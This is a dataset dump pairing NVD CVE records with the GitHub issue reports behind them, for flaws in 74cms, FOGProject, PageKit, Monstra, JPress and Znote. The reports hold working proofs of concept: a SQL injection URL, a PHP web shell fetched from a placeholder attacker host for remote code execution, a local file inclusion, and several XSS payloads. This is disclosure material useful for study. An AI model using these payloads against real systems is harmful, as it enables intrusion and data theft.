cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2020-22211
2021-06-16T18:15:07.860
SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/13" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "EE13452F-D4FF-47A1-9821-61F4655EE220", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/13
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
quite like the one https://github.com/blindkey/cve_like/issues/10 look at the file with the act = "key" below ![image](https://user-images.githubusercontent.com/703783/74737520-f86e4a80-528f-11ea-9741-28cf730112a5.png) $keys just get iconv and then pass to the sql ,and finally leads to sql inject .. poc: `plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(123666),9%23 `
74cms 3.2.0 ajax_street.php key SQL inject
https://api.github.com/repos/blindkey/cve_like/issues/13/comments
0
2020-02-18T12:49:10Z
2020-02-18T13:37:09Z
https://github.com/blindkey/cve_like/issues/13
566,870,873
13
2,073
CVE-2020-22212
2021-06-16T18:15:07.890
SQL Injection in 74cms 3.2.0 via the id parameter to wap/wap-company-show.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "EE13452F-D4FF-47A1-9821-61F4655EE220", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/14
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
in file :wap/wap-company-show.php ![image](https://user-images.githubusercontent.com/703783/74738062-18ead480-5291-11ea-8fc0-6b90912c256e.png) $smarty->assign('show',company_one($_GET['id'])); id was direcly pass to sql expression and finally leads to sql inject .
74cms 3.2.0 wap/wap-company-show.php id SQL inject
https://api.github.com/repos/blindkey/cve_like/issues/14/comments
0
2020-02-18T12:57:08Z
2020-02-18T12:57:08Z
https://github.com/blindkey/cve_like/issues/14
566,875,292
14
2,074
CVE-2021-32243
2021-06-16T21:15:08.103
FOGProject v1.5.9 is affected by a File Upload RCE (Authenticated).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FOGProject/fogproject/issues/422" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FOGProject/fogproject/issues/422" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fogproject:fogproject:1.5.9:*:*:*:*:*:*:*", "matchCriteriaId": "4B2E1E6D-49B3-4CA3-9DEE-D89F4AF24BDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/FOGProject/fogproject/issues/422
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FOGProject", "fogproject" ]
1) Create an empty 10Mb file. dd if=/dev/zero of=myshell bs=10485760 count=1 2) Add your PHP code to the end of the file created in the step 1. echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell 3) Put the file "myshell" accessible through HTTP. $ cp myshell /var/www/html 4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP). $ echo "http://ATTACKER_IP/myshell" | base64 aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo= 5) Visit http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64 Example: http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64 6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php and click on Install. 7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=whoami execute system whoami command
FOGProject 1.5.9 - File Upload RCE (Authenticated)
https://api.github.com/repos/FOGProject/fogproject/issues/422/comments
9
2021-04-29T11:39:10Z
2023-04-12T08:00:49Z
https://github.com/FOGProject/fogproject/issues/422
870,920,790
422
2,075
CVE-2021-32245
2021-06-16T21:15:08.173
In PageKit v1.0.18, a user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to "/storage/exp.svg" that will point to http://localhost/pagekit/storage/exp.svg. When a user comes along to click that link, it will trigger a XSS attack.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pagekit/pagekit/issues/963" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/pagekit/pagekit/issues/963" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pagekit:pagekit:1.0.18:*:*:*:*:*:*:*", "matchCriteriaId": "A1E39691-604C-42A3-BA30-80433E0E09EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/pagekit/pagekit/issues/963
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "pagekit", "pagekit" ]
## Problem A user can upload SVG files in the file upload portion of the CMS. These SVG files can contain malicious scripts. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to "/storage/exp.svg" that will point to http://localhost/pagekit/storage/exp.svg. When a user comes along to click that link, it will trigger a XSS attack. ![pagekit com_xss](https://user-images.githubusercontent.com/37947784/116669432-22151c80-a9d1-11eb-8bdb-72dd94016c97.gif) ## EXP ``` exp.svg ``` ``` <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(/xss/); </script> </svg> ``` ## Technical Details - Pagekit version: 1.0.18. - Webserver: nginx1.15.11 - Database: MySQL5.7.26 - PHP Version: 7.3.4
A stored XSS has been found in PageKit CMS affecting versions 1.0.18.
https://api.github.com/repos/pagekit/pagekit/issues/963/comments
2
2021-04-30T08:11:10Z
2021-06-17T10:14:52Z
https://github.com/pagekit/pagekit/issues/963
872,144,396
963
2,076
CVE-2020-25414
2021-06-17T15:15:07.567
A local file inclusion vulnerability was discovered in the captcha function in Monstra 3.0.4 which allows remote attackers to execute arbitrary PHP code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/469" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/469" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "13838C95-223E-4896-AA83-B437EFD45660", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "829" ]
829
https://github.com/monstra-cms/monstra/issues/469
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
**Brief of this vulnerability** There is a local File Inclusion Vulnerability in the CMS, which can be exploited by an attacker to execute PHP code **Test Environment** Apache/2.4.39 (Windows10) PHP 5.4.45-2+mysql 5.7.26 **Affect version** <=3.0.4 **payload** http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=filename We can create phpinfo.txt In the web directory, the content is`<?php phpinfo();?>` ![image](https://user-images.githubusercontent.com/70700360/92112927-1e6cce00-ee21-11ea-9286-3e8028bc3d05.png) http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\www\phpinfo.txt ![image](https://user-images.githubusercontent.com/70700360/92113158-7dcade00-ee21-11ea-9193-abd4c9320e75.png) **Or we can use Apache logs** 1. use burpsuite ![image](https://user-images.githubusercontent.com/70700360/92115004-588b9f00-ee24-11ea-9923-bafd27fccf55.png) 2. include log http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log ![image](https://user-images.githubusercontent.com/70700360/92115203-a7d1cf80-ee24-11ea-823b-4082b02891af.png) **Reason of This Vulnerability** Directly from the get parameter and include this parameter, resulting in a vulnerability,Vulnerability file: `plugins\captcha\crypt\cryptographp.inc.php` ``` #..\plugins\captcha\crypt\cryptographp.inc.php if (( ! isset($_COOKIE['cryptcookietest'])) and ($_GET[$_GET['sn']] == "")) { header("Content-type: image/png"); readfile('images/erreur3.png'); exit; } if ($_GET[$_GET['sn']] == "") { unset ($_GET['sn']); } session_start(); // Takes only the configuration files in the same directory if ($_GET['cfg'] ) { $_SESSION['configfile']=$_GET['cfg']; } else { $_SESSION['configfile'] = "cryptographp.cfg.php"; } include($_SESSION['configfile']); ``` As long as we assign a value to the sn variable and it is not empty, we can skip the first 2 if syntax,The variable CFG is directly assigned to configFile, and then the include method is executed, resulting in a vulnerability
Monstra 3.0.4 Local File Inclusion Vulnerability
https://api.github.com/repos/monstra-cms/monstra/issues/469/comments
0
2020-09-03T13:11:48Z
2020-09-03T13:11:48Z
https://github.com/monstra-cms/monstra/issues/469
691,959,185
469
2,077
CVE-2021-33347
2021-06-18T11:15:08.683
An issue was discovered in JPress v3.3.0 and below. There are XSS vulnerabilities in the template module and tag management module. If you log in to the background by means of weak password, the storage XSS vulnerability can occur.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/152" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/152#issuecomment-850119847" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/152" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/152#issuecomment-850119847" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpress:jpress:*:*:*:*:*:*:*:*", "matchCriteriaId": "9490D0F8-6697-4AD8-B622-08262F8DCE36", "versionEndExcluding": null, "versionEndIncluding": "3.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/JPressProjects/jpress/issues/152
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JPressProjects", "jpress" ]
There is a storage XSS vulnerability in the template module. The figure shows the setting interface of template management, which is used to describe the left part of the home page. URL: `http://localhost:8080/admin/template/setting` ![](https://raw.githubusercontent.com/HyCXSS/IMG/main/1.png) After inputting the payload in the figure above, any user entering the home page will trigger XSS vulnerability. ![](https://raw.githubusercontent.com/HyCXSS/IMG/main/2.png) However, if hackers enter the background by means of weak password and add XSS code, they can easily cause great harm: Hijacking cookies, obtaining sensitive information, phishing and so on. Similarly, there is a storage XSS vulnerability in commodity tag management, which can be successfully triggered on the commodity page ![](https://raw.githubusercontent.com/HyCXSS/IMG/main/3.png)
There is a storage XSS vulnerability in the template module
https://api.github.com/repos/JPressProjects/jpress/issues/152/comments
1
2021-05-12T12:06:12Z
2021-05-28T04:21:50Z
https://github.com/JPressProjects/jpress/issues/152
890,015,600
152
2,078
CVE-2021-33347
2021-06-18T11:15:08.683
An issue was discovered in JPress v3.3.0 and below. There are XSS vulnerabilities in the template module and tag management module. If you log in to the background by means of weak password, the storage XSS vulnerability can occur.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/152" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/152#issuecomment-850119847" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/152" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/JPressProjects/jpress/issues/152#issuecomment-850119847" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpress:jpress:*:*:*:*:*:*:*:*", "matchCriteriaId": "9490D0F8-6697-4AD8-B622-08262F8DCE36", "versionEndExcluding": null, "versionEndIncluding": "3.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/JPressProjects/jpress/issues/152#issuecomment-850119847
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "JPressProjects", "jpress" ]
There is a storage XSS vulnerability in the template module. The figure shows the setting interface of template management, which is used to describe the left part of the home page. URL: `http://localhost:8080/admin/template/setting` ![](https://raw.githubusercontent.com/HyCXSS/IMG/main/1.png) After inputting the payload in the figure above, any user entering the home page will trigger XSS vulnerability. ![](https://raw.githubusercontent.com/HyCXSS/IMG/main/2.png) However, if hackers enter the background by means of weak password and add XSS code, they can easily cause great harm: Hijacking cookies, obtaining sensitive information, phishing and so on. Similarly, there is a storage XSS vulnerability in commodity tag management, which can be successfully triggered on the commodity page ![](https://raw.githubusercontent.com/HyCXSS/IMG/main/3.png)
There is a storage XSS vulnerability in the template module
https://api.github.com/repos/JPressProjects/jpress/issues/152/comments
1
2021-05-12T12:06:12Z
2021-05-28T04:21:50Z
https://github.com/JPressProjects/jpress/issues/152
890,015,600
152
2,079
CVE-2021-26834
2021-06-18T12:15:08.007
A cross-site scripting (XSS) vulnerability exists in Znote 0.5.2. An attacker can insert payloads, and the code execution will happen immediately on markdown view mode.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alagrede/znote-app/issues/5" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.electronjs.org/apps/znote" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alagrede/znote-app/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.electronjs.org/apps/znote" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:znote:znote:0.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "824E5B93-457D-4DFB-A95E-CF50FD3004C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/alagrede/znote-app/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "alagrede", "znote-app" ]
[Description] Multiple XSS payloads are available for znote. It leads to attacker's javascript execution [Reproduce] You can try with copy paste the payloads below: 1. ``` <svg> <svg onload=alert(1)> ``` 2. `<iframe src=x onload=alert(1)>` <img width="1013" alt="截圖 2021-02-03 下午9 57 16" src="https://user-images.githubusercontent.com/64322368/106756955-ca357680-666a-11eb-9b0a-7465283d3810.png">
Multiple Stored XSS
https://api.github.com/repos/alagrede/znote-app/issues/5/comments
4
2021-02-03T14:00:34Z
2021-02-04T17:02:07Z
https://github.com/alagrede/znote-app/issues/5
800,356,689
5
2,080
CVE-2021-26835
2021-06-18T12:15:08.040
No filtering of cross-site scripting (XSS) payloads in the markdown-editor in Zettlr 1.8.7 allows attackers to perform remote code execution via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Zettlr/Zettlr/issues/1716" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/Zettlr/Zettlr/releases/tag/v1.8.9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/Zettlr/Zettlr/issues/1716" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/Zettlr/Zettlr/releases/tag/v1.8.9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zettlr:zettlr:1.8.7:*:*:*:*:*:*:*", "matchCriteriaId": "7E58B425-2557-43C9-AD70-AD5F31966166", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
